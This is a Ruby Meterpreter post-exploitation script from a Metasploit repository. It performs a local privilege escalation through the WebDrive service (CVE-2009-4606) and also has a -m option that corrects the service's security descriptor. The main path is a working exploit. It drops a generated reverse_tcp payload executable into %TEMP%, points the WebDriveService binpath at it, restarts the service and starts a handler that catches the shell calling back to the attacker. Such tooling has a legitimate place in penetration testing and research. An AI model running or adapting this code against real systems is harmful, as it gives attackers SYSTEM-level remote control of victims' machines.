root / scripts / meterpreter / srt_webdrive_priv.rb @ master
History | View | Annotate | Download (4.2 kB)
| 1 |
# $Id$
|
|---|---|
| 2 |
# $Revision$
|
| 3 |
|
| 4 |
##
|
| 5 |
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
|
| 6 |
#
|
| 7 |
# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
|
| 8 |
# Due to an empty security descriptor, a local attacker can gain elevated privileges.
|
| 9 |
# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
|
| 10 |
# Vulnerability mitigation featured.
|
| 11 |
#
|
| 12 |
# Credit:
|
| 13 |
# - Discovery - Nine:Situations:Group::bellick
|
| 14 |
# - Meterpreter script - Trancer
|
| 15 |
#
|
| 16 |
# References:
|
| 17 |
# - http://retrogod.altervista.org/9sg_south_river_priv.html
|
| 18 |
# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
|
| 19 |
# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
|
| 20 |
# - http://osvdb.org/show/osvdb/59080
|
| 21 |
#
|
| 22 |
# mtrancer[@]gmail.com
|
| 23 |
# http://www.rec-sec.com
|
| 24 |
##
|
| 25 |
|
| 26 |
#
|
| 27 |
# Options
|
| 28 |
#
|
| 29 |
opts = Rex::Parser::Arguments.new( |
| 30 |
"-h" => [ false, "This help menu"], |
| 31 |
"-m" => [ false, "Mitigate"], |
| 32 |
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], |
| 33 |
"-p" => [ true, "The port on the remote host where Metasploit is listening"] |
| 34 |
) |
| 35 |
|
| 36 |
#
|
| 37 |
# Default parameters
|
| 38 |
#
|
| 39 |
|
| 40 |
rhost = Rex::Socket.source_address("1.2.3.4") |
| 41 |
rport = 4444
|
| 42 |
sname = 'WebDriveService'
|
| 43 |
pname = 'wdService.exe'
|
| 44 |
|
| 45 |
#check for proper Meterpreter Platform
|
| 46 |
def unsupported |
| 47 |
print_error("This version of Meterpreter is not supported with this Script!")
|
| 48 |
raise Rex::Script::Completed |
| 49 |
end
|
| 50 |
unsupported if client.platform !~ /win32|win64/i |
| 51 |
#
|
| 52 |
# Option parsing
|
| 53 |
#
|
| 54 |
opts.parse(args) do |opt, idx, val|
|
| 55 |
case opt
|
| 56 |
when "-h" |
| 57 |
print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
|
| 58 |
print_line(opts.usage) |
| 59 |
raise Rex::Script::Completed |
| 60 |
when "-m" |
| 61 |
client.sys.process.get_processes().each do |m|
|
| 62 |
if ( m['name'] == pname ) |
| 63 |
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
|
| 64 |
|
| 65 |
# Set correct service security descriptor to mitigate the vulnerability
|
| 66 |
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
|
| 67 |
client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)",
|
| 68 |
nil, {'Hidden' => 'true'}) |
| 69 |
end
|
| 70 |
end
|
| 71 |
raise Rex::Script::Completed |
| 72 |
when "-r" |
| 73 |
rhost = val |
| 74 |
when "-p" |
| 75 |
rport = val.to_i |
| 76 |
end
|
| 77 |
end
|
| 78 |
|
| 79 |
client.sys.process.get_processes().each do |m|
|
| 80 |
if ( m['name'] == pname ) |
| 81 |
|
| 82 |
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
|
| 83 |
|
| 84 |
# Build out the exe payload.
|
| 85 |
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
|
| 86 |
pay.datastore['LHOST'] = rhost
|
| 87 |
pay.datastore['LPORT'] = rport
|
| 88 |
raw = pay.generate |
| 89 |
|
| 90 |
exe = Msf::Util::EXE.to_win32pe(client.framework, raw) |
| 91 |
|
| 92 |
# Place our newly created exe in %TEMP%
|
| 93 |
tempdir = client.fs.file.expand_path("%TEMP%")
|
| 94 |
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" |
| 95 |
print_status("Sending EXE payload '#{tempexe}'.")
|
| 96 |
fd = client.fs.file.new(tempexe, "wb")
|
| 97 |
fd.write(exe) |
| 98 |
fd.close |
| 99 |
|
| 100 |
# Stop the vulnerable service
|
| 101 |
print_status("Stopping service \"#{sname}\"...")
|
| 102 |
client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'}) |
| 103 |
|
| 104 |
# Set exe payload as service binpath
|
| 105 |
print_status("Setting \"#{sname}\" to #{tempexe}...")
|
| 106 |
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'}) |
| 107 |
sleep(1)
|
| 108 |
|
| 109 |
# Restart the service
|
| 110 |
print_status("Restarting the \"#{sname}\" service...")
|
| 111 |
client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'}) |
| 112 |
|
| 113 |
# Our handler to recieve the callback.
|
| 114 |
handler = client.framework.exploits.create("multi/handler")
|
| 115 |
handler.datastore['WORKSPACE'] = client.workspace
|
| 116 |
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" |
| 117 |
handler.datastore['LHOST'] = rhost
|
| 118 |
handler.datastore['LPORT'] = rport
|
| 119 |
handler.datastore['ExitOnSession'] = false |
| 120 |
|
| 121 |
handler.exploit_simple( |
| 122 |
'Payload' => handler.datastore['PAYLOAD'], |
| 123 |
'RunAsJob' => true |
| 124 |
) |
| 125 |
|
| 126 |
# Set service binpath back to normal
|
| 127 |
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'}) |
| 128 |
|
| 129 |
end
|
| 130 |
end
|
| 131 |
|